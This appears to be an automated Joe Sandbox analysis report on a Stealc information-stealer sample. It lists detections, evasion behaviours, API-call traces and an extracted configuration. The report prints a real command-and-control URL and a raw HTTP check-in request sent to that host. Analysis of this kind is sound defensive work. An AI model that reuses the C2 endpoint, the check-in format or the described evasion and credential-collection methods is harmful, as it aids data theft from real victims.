Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1572084
MD5:e814098146a7d5bb6910f684d24ddda7
SHA1:3ac620ff3ae684e4d614ffb27821d8301f973a84
SHA256:8bd7b0662ecb72eb60b3ae68a0534acb4a787263a37a619a48bc7a2186c4415d
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E814098146A7D5BB6910F684D24DDDA7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1696046982.0000000004A00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1747032810.0000000000536000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7324JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7324JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-10T04:31:05.531407+010020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php/yAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7324.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
              Multi AV Scanner detection for domain / URL
              Source: http://185.215.113.206/c4becf79229cb002.php/yVirustotal: Detection: 18%Perma Link
              Multi AV Scanner detection for submitted file
              Source: file.exeVirustotal: Detection: 52%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_008C4B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E4090 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_008E4090
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C6000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_008C6000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_008C9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9BE0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_008C9BE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CED90 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_008CED90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D6DE0 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_008D6DE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7690 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_008C7690
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D6FF9 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_008D6FF9
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DE330 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008DE330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D3CC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008D3CC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DCCE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008DCCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D1C40 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008D1C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C15A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_008C15A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C15B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_008C15B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D15C0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008D15C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008CDD70 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008CDD70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D4EC0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008D4EC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DD640 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_008DD640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DDE50 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_008DDE50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2730 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_008D2730
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008D2749 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_008D2749

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 43 38 32 32 45 36 43 41 39 32 31 32 37 33 37 30 37 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="hwid"8A1C822E6CA92127370785------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build"stok------GIJJKFCGDGHDHIECGCBK--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C4B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_008C4B80
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 31 43 38 32 32 45 36 43 41 39 32 31 32 37 33 37 30 37 38 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="hwid"8A1C822E6CA92127370785------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="build"stok------GIJJKFCGDGHDHIECGCBK--
              Source: file.exe, 00000000.00000002.1747032810.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/1
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/L
              Source: file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/y
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php_
              Source: file.exe, 00000000.00000002.1747032810.0000000000561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpt
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/k
              Source: file.exe, 00000000.00000002.1747032810.0000000000576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/w
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C9876 CreateDesktopA,lstrcat,lstrcat,lstrcat,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_008C9876

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3F0EA0_2_00C3F0EA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C778F00_2_00C778F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7508D0_2_00C7508D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E48D00_2_008E48D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7D8460_2_00C7D846
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4D0750_2_00B4D075
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D499D70_2_00D499D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C829FA0_2_00C829FA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B872950_2_00B87295
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C71A830_2_00C71A83
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C1EA970_2_00C1EA97
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7A2560_2_00C7A256
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7BCAF0_2_00C7BCAF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C05DC80_2_00C05DC8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C735F90_2_00C735F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C845B50_2_00C845B5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4C5570_2_00C4C557
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6C5250_2_00B6C525
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D055390_2_00D05539
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C6069F0_2_00C6069F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8160B0_2_00C8160B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7F77E0_2_00C7F77E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7877A0_2_00C7877A
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 008C4980 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: dnuvwdxn ZLIB complexity 0.9948512815427621
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E39F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_008E39F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008DCBE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_008DCBE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\M0F35AO3.htmJump to behavior
